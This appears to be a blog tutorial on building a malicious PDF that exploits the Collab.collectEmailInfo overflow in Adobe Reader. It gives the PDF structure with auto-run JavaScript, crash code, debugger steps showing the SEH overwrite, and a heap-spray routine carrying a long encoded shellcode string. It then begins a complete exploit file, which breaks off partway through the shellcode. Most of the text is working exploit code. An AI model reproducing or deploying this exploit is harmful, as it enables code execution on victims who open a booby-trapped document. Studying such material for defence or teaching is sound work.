12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">7 0 obj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Type /Action<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier 
New',courier,monospace; background-color: #ffffff"> /S /JavaScript<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /JS (<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> <span style="color: #0000ff">this</span>.collabStore = Collab.collectEmailInfo({subj: "<span style="color: #8b0000">ss</span>",msg: "<span style="color: #8b0000">hi</span>"});<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">>><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">endobj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">xref<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">0 8<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">0000000000 65535 f<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">0000000012 00000 n<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; 
font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">0000000109 00000 n<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">0000000165 00000 n<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">0000000234 00000 n<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">0000000439 00000 n<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">0000000553 00000 n<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">0000000677 00000 n<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">trailer<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"><<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /Size 8<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Root 1 0 R<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">>><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">startxref<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; 
background-color: #ffffff">784<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">%%EOF<br /></pre></pre>
<p><strong>Code List 1</strong></p>
<p>Any JavaScript placed inside the /JS ( ) string of object 7 above runs as soon as the document is opened, because the catalog's /OpenAction entry points at that action object.</p>
<p>The following code overflows the stack:</p>
<pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 507px; padding-top: 5px; border-bottom: #cecece 1px solid; height: 101px; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"><span style="color: #0000ff">var</span> crsh = <span style="color: #0000ff">unescape</span>("<span style="color: #8b0000">%u1212</span>");<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><span style="color: #0000ff">while</span> (crsh.<span style="color: #0000ff">length</span> < 0x2000)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> crsh += crsh;<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><span style="color: #0000ff">if</span> (app.viewerVersion >= 6.0)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> {<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> <span style="color: #0000ff">this</span>.collabStore = Collab.collectEmailInfo({subj: "<span style="color: #8b0000"></span>",msg: crsh});<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> }</pre></pre>
<p><strong>Code List 2</strong></p>
<p>Place this code inside the /JS ( ) string of Code List 1.</p>
<p>Then start Adobe Reader under OllyDbg, run it, and open the PDF. When OllyDbg breaks on an exception, press Shift+F9 to pass the exception to the program, and keep doing so until EIP gets overwritten.</p>
<pre><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHAnnm0vDf2i1VZIQGODbxGPKdUyBQZjaSC1-03kfbyWgX7Lq3fNQioenuP24MzxdtxVefGBbXQ-ak-2zNLVvAJwIIOmkRQwJFaTiySdAgzvFz48SOhU7vMOOfpGRR4EFi9iNzLiucMu9Q/s1600-h/image%25255B3%25255D.png"><img title="image" style="border-right: 0px; border-top: 0px; display: inline; border-left: 0px; border-bottom: 0px" height="109" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5sq7TtQjoHCKVmhs4CvNoIbrZ8GZ3UpX1oJt5lLmdFVu0Nd1XJyQ-oaskQz7lsO_c3PtQHB7XscpIi2vB4-A6RK2LR6Kin16VyY1zkwdFXzj4zXH-to3VmUBugRH77vGSWen4NOv_f_Mc//?imgmax=800" width="509" border="0"></a> </pre>
<p>Also look at the SEH chain in OllyDbg (View -> SEH chain):</p>
<pre><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7K9jzg2twqJy_MqZPwJfSftvMEqX5u9yBZtrFrtXbH9UuM-nZiZbxImZ5c1FMqL_G2lpMHlvBecayu5k5rb1J2T4de0mS7tKX9PO2X-oEdTZV1PnyRUPjXoouTd8uQfEqO_Ha0lEP7KJr/s1600-h/image%25255B10%25255D.png"><img title="image" style="border-right: 0px; border-top: 0px; display: inline; border-left: 0px; border-bottom: 0px" height="324" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkOuVx_n4JptcTqievHVSXlAFT0TV2hBEIsmRTX0WDZKq3IfX9wQ4lX5d0SKpKJIcSBlE9t7Bac28GlUX8vkiZ7bLyl_YPAT_k-uLbXdDIunjO0Ts07R_UjGVsDQo8I3Jzr0jmaPWAWea_//?imgmax=800" width="400" border="0"></a> </pre>
<p>So we see the SEH chain gets overwritten.</p>
<p>Now let's create the exploit code.</p>
<pre>The following function sprays the heap with 
shellcode and nops.</pre><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 512px; padding-top: 5px; border-bottom: #cecece 1px solid; height: 169px; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"><span style="color: #0000ff">function</span> HeapSpray()<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">{<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"><span style="color: #0000ff">Array</span>2 = <span style="color: #0000ff">new</span> <span style="color: #0000ff">Array</span>();<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><span style="color: #0000ff">var</span> Shellcode = <span style="color: #0000ff">unescape</span>("<span style="color: 
#8b0000">%u3c73%u343f%u3514%u2a1c%ud6d2%ub624%u2c7c%ud538%ub8b5%uf533%u7e37%u7925%ue031%u9027%u19b2%u4be2%u4078%u097b%u71f8%u9948%ubf8d%u1d9f%u4315%u767d%u752d%u494e%u98b0%u727f%u7a76%ub30c%u8392%ue2d1%u3d7c%u91b9%u2270%u2ffc%ub2a8%u2c92%u4796%ua90d%u357b%ub49f%u98b0%u04b3%uf539%u46b8%uf929%u7d4f%u7315%ubf66%u778d%ub54a%u417e%ue319%u0243%ubbd5%ueb31%u781c%u9325%ube42%u9990%u2405%u103c%ud4d0%ufd84%u1879%u2be1%u74f8%u0827%u40d6%ub72d%ue009%u491d%u3771%u3fb1%u6748%u7534%ub64e%u9b0c%u3dba%u147c%u8797%ue1f7%u8c4b%u0ce2%u808d%u66f9%u404a%u2f3d%ue311%u277a%u2442%u38bf%u93fd%u25b4%u491c%u0191%u1df8%u9747%u4f71%u9048%u7e35%ub54e%u4bb8%u99b0%ud603%u373c%u78b2%u702c%ua843%u04b1%u85b6%u7deb%ufc6b%u7bb9%u6773%ub3a9%u7672%ube0d%u4115%u0534%u7492%uf512%ud50a%u7f79%u2175%u2de0%u9b9f%uff83%uc0c7%u77d4%u3f46%uba96%u98b7%u14bb%uba24%u7d2f%u4377%u7690%ubf3d%u728d%ufd30%u49b4%ub266%u89bb%ue2d2%u2570%ub09f%u3c78%ub840%u4e27%ue01a%u3746%ub12d%u4297%uf988%u7b04%u3579%u3275%uc6fe%ue3c1%uf869%u2873%u47eb%u4b7f%ub998%u3414%u9691%uf523%ufc13%u7a93%u9967%ud620%u051d%u74a8%u2271%u4ad4%u15a9%u484f%ud51b%u3fbe%ub6b3%u0cb7%ue181%u922c%u0d9b%u1c7c%u7eb5%u7341%u667a%u70be%u7974%u757b%ub737%ud33a%u9ff9%ub62f%u2598%u4034%u9067%u777f%uf60b%u1de3%u3993%u4ae2%u422d%u1571%u247e%u4792%ub5a8%u3fb0%u7d0c%ud62a%u86b1%ue0f7%u8d4f%ua943%u761c%u4e0d%u05bb%u3327%u46f5%u3d9b%u3c35%u3b72%u04f8%uf621%u4bd4%u41b8%u7897%ufd22%u9114%u7cb9%ufc03%ud186%u20eb%u49e1%ub3bf%u9699%u2cb4%u48b2%ud533%u7bba%u8366%u72e3%u7014%ud069%u98d4%u963c%u3f74%u7877%u737a%u8d49%u1941%u71e1%u0105%ub2f8%u4f4a%u0d7c%ud30a%u79eb%uf52b%u34b5%ube43%u97b7%u1c04%ub990%u2c35%u819f%uf9c1%u6b48%u93fc%u3775%u0c2f%ua9b3%u272d%u91ba%u7da8%u9225%u994e%ud584%ubb46%u761d%ub115%u1a7f%u42e0%ub647%u9bb8%ud631%u243d%ufd0b%ub0bf%ue211%ub467%u7e4b%u7c7b%u7e78%u7477%u9740%u109b%u05e3%ub13c%u85bb%u47d5%u6670%ub741%uf829%u3a72%u71eb%u2f7a%u7d46%u4875%u7fb9%u1d04%u894f%u37e0%u93b5%u7973%ufc3b%ub64e%u9298%u9f3f%ua9a8%ufd08%u1cbf%u144a%u340c%u322c%u2de1%ub296%uba67%u497
6%uf502%u25be%u4b40%ue280%u9943%u7bb3%ue030%ub027%ub4b8%u7691%u7015%u7942%ud638%u3974%u35eb%ue288%u7c24%ud412%ud287%u0de3%u3d77%u908d%u1b71%u7ef9%uf528%u9966%u3c73%u922c%u2a72%u0df9%u4a4f%ud523%u187f%u7afd%u0935%u2fe1%ubb47%u48be%ub2b6%u7d91%u7805%ud413%ub8b0%u1475%u438d%u9634%u044b%u970c%u8cb9%u25d6%u1d90%u931c%u27ba%ub3bf%ua846%u24a9%uc041%u40f8%u153d%u4e42%ub49f%ub5b7%ufc3f%u492d%ub167%u9b98%uda37%ubace%ufdc9%u156d%u74d9%uf424%u2b58%ub1c9%u3133%u1750%u5003%u8317%uf909%ue08f%uea75%u0bd9%ueb85%u82b9%uda60%uf1eb%u4fe1%u713c%u63a7%ud7b7%uf753%uffb5%ub054%u2670%u415b%ue6b5%u8137%u9ad7%ud645%ua237%u2b86%ue339%uc4fa%ubc6b%u7671%uc99c%u4bc7%u1d9d%uf34c%u18e5%u8092%u225f%u39c2%u6ceb%u32fa%u4cb3%u97fb%ub1a7%u9cb2%u411c%u7545%uaa6d%ub974%u9522%u34b9%ud13a%ua77d%u2949%u5a7e%uea4a%u80fd%uefdf%u43a5%ud447%u8754%u9f1e%u6c5a%uc754%u737e%u73b9%uf87a%u543c%uba0b%u701a%u1850%u2102%ucf3c%u313b%ub098%u3999%ua40a%u6398%u3b40%u1e28%u3b2d%u2132%u541d%uaa03%u23f2%u799c%udcb7%u20d6%u7491%ub0bf%u18a0%u6f40%u24e6%u9ac3%ud296%ueedb%u9f93%u025b%ub0e9%u2409%ub05e%u471b%u2201%ua6c7%uc2a4%ub762</span>");<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"><span style="color: #0000ff">var</span> SprayValue = <span style="color: #0000ff">unescape</span>("<span style="color: #8b0000">%u9090%u9090</span>");<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><span style="color: #0000ff">do</span>{SprayValue +=SprayValue}<span style="color: #0000ff">while</span>(SprayValue.<span style="color: #0000ff">length</span> < 800000/2);<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: 
#ffffff"><span style="color: #0000ff">for</span>(j=0;j<200;j++) <span style="color: #0000ff">Array</span>2[j]=SprayValue+Shellcode;<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">}</pre></pre>
<p>You can adjust the values 800000/2 (the length of each sprayed block) and j<200 (the number of blocks) and test the exploit.</p>
<p>The following code overwrites the SEH handler with 0x0a0a0a0a, which redirects execution to that heap address, where our sprayed NOPs and shellcode reside.</p>
<pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 516px; padding-top: 5px; border-bottom: #cecece 1px solid; height: 105px; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"><span style="color: #0000ff">var</span> crsh = <span style="color: #0000ff">unescape</span>("<span style="color: #8b0000">%u0a0a%u0a0a</span>");<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><span style="color: #0000ff">while</span> (crsh.<span style="color: #0000ff">length</span> < 0x4000)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> crsh += crsh;<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><span style="color: #0000ff">if</span> (app.viewerVersion >= 6.0)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> {<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> <span style="color: #0000ff">this</span>.collabStore = Collab.collectEmailInfo({subj: "<span style="color: #8b0000"></span>",msg: crsh});<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> }</pre></pre>
<p>Now the complete exploit code all together.</p>
<pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 521px; padding-top: 5px; border-bottom: #cecece 1px solid; height: 196px; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">%PDF-1.1<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">1 0 obj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Type /Catalog<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /Outlines 2 0 R<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Pages 3 0 R<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; 
font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /OpenAction 7 0 R<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">>><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">endobj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">2 0 obj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"><<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /Type /Outlines<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Count 0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">>><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">endobj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">3 0 obj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 
100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Type /Pages<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /Kids [4 0 R]<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Count 1<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">>><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">endobj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">4 0 obj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Type /Page<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /Parent 3 0 R<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /MediaBox [0 0 612 792]<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /Contents 5 0 R<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 
/Resources <<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /ProcSet [/PDF /Text]<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Font << /F1 6 0 R >><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> >><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">>><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">endobj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">5 0 obj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"><< /Length 56 >><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">stream<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">BT /F1 12 Tf 100 700 Td 15 TL (JavaScript example) Tj ET<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">endstream<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">endobj<br /></pre><pre style="font-size: 12px; margin: 
0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">6 0 obj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Type /Font<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /Subtype /Type1<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Name /F1<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /BaseFont /Helvetica<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Encoding /MacRomanEncoding<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">>><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">endobj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">7 0 obj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><<<br 
/></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Type /Action<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /S /JavaScript<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /JS (<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><span style="color: #0000ff">function</span> HeapSpray()<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">{<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><span style="color: #0000ff">Array</span>2 = <span style="color: #0000ff">new</span> <span style="color: #0000ff">Array</span>();<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"><span style="color: #0000ff">var</span> Shellcode = <span style="color: #0000ff">unescape</span>("<span style="color: 
#8b0000">%u3c73%u343f%u3514%u2a1c%ud6d2%ub624%u2c7c%ud538%ub8b5%uf533%u7e37%u7925%ue031%u9027%u19b2%u4be2%u4078%u097b%u71f8%u9948%ubf8d%u1d9f%u4315%u767d%u752d%u494e%u98b0%u727f%u7a76%ub30c%u8392%ue2d1%u3d7c%u91b9%u2270%u2ffc%ub2a8%u2c92%u4796%ua90d%u357b%ub49f%u98b0%u04b3%uf539%u46b8%uf929%u7d4f%u7315%ubf66%u778d%ub54a%u417e%ue319%u0243%ubbd5%ueb31%u781c%u9325%ube42%u9990%u2405%u103c%ud4d0%ufd84%u1879%u2be1%u74f8%u0827%u40d6%ub72d%ue009%u491d%u3771%u3fb1%u6748%u7534%ub64e%u9b0c%u3dba%u147c%u8797%ue1f7%u8c4b%u0ce2%u808d%u66f9%u404a%u2f3d%ue311%u277a%u2442%u38bf%u93fd%u25b4%u491c%u0191%u1df8%u9747%u4f71%u9048%u7e35%ub54e%u4bb8%u99b0%ud603%u373c%u78b2%u702c%ua843%u04b1%u85b6%u7deb%ufc6b%u7bb9%u6773%ub3a9%u7672%ube0d%u4115%u0534%u7492%uf512%ud50a%u7f79%u2175%u2de0%u9b9f%uff83%uc0c7%u77d4%u3f46%uba96%u98b7%u14bb%uba24%u7d2f%u4377%u7690%ubf3d%u728d%ufd30%u49b4%ub266%u89bb%ue2d2%u2570%ub09f%u3c78%ub840%u4e27%ue01a%u3746%ub12d%u4297%uf988%u7b04%u3579%u3275%uc6fe%ue3c1%uf869%u2873%u47eb%u4b7f%ub998%u3414%u9691%uf523%ufc13%u7a93%u9967%ud620%u051d%u74a8%u2271%u4ad4%u15a9%u484f%ud51b%u3fbe%ub6b3%u0cb7%ue181%u922c%u0d9b%u1c7c%u7eb5%u7341%u667a%u70be%u7974%u757b%ub737%ud33a%u9ff9%ub62f%u2598%u4034%u9067%u777f%uf60b%u1de3%u3993%u4ae2%u422d%u1571%u247e%u4792%ub5a8%u3fb0%u7d0c%ud62a%u86b1%ue0f7%u8d4f%ua943%u761c%u4e0d%u05bb%u3327%u46f5%u3d9b%u3c35%u3b72%u04f8%uf621%u4bd4%u41b8%u7897%ufd22%u9114%u7cb9%ufc03%ud186%u20eb%u49e1%ub3bf%u9699%u2cb4%u48b2%ud533%u7bba%u8366%u72e3%u7014%ud069%u98d4%u963c%u3f74%u7877%u737a%u8d49%u1941%u71e1%u0105%ub2f8%u4f4a%u0d7c%ud30a%u79eb%uf52b%u34b5%ube43%u97b7%u1c04%ub990%u2c35%u819f%uf9c1%u6b48%u93fc%u3775%u0c2f%ua9b3%u272d%u91ba%u7da8%u9225%u994e%ud584%ubb46%u761d%ub115%u1a7f%u42e0%ub647%u9bb8%ud631%u243d%ufd0b%ub0bf%ue211%ub467%u7e4b%u7c7b%u7e78%u7477%u9740%u109b%u05e3%ub13c%u85bb%u47d5%u6670%ub741%uf829%u3a72%u71eb%u2f7a%u7d46%u4875%u7fb9%u1d04%u894f%u37e0%u93b5%u7973%ufc3b%ub64e%u9298%u9f3f%u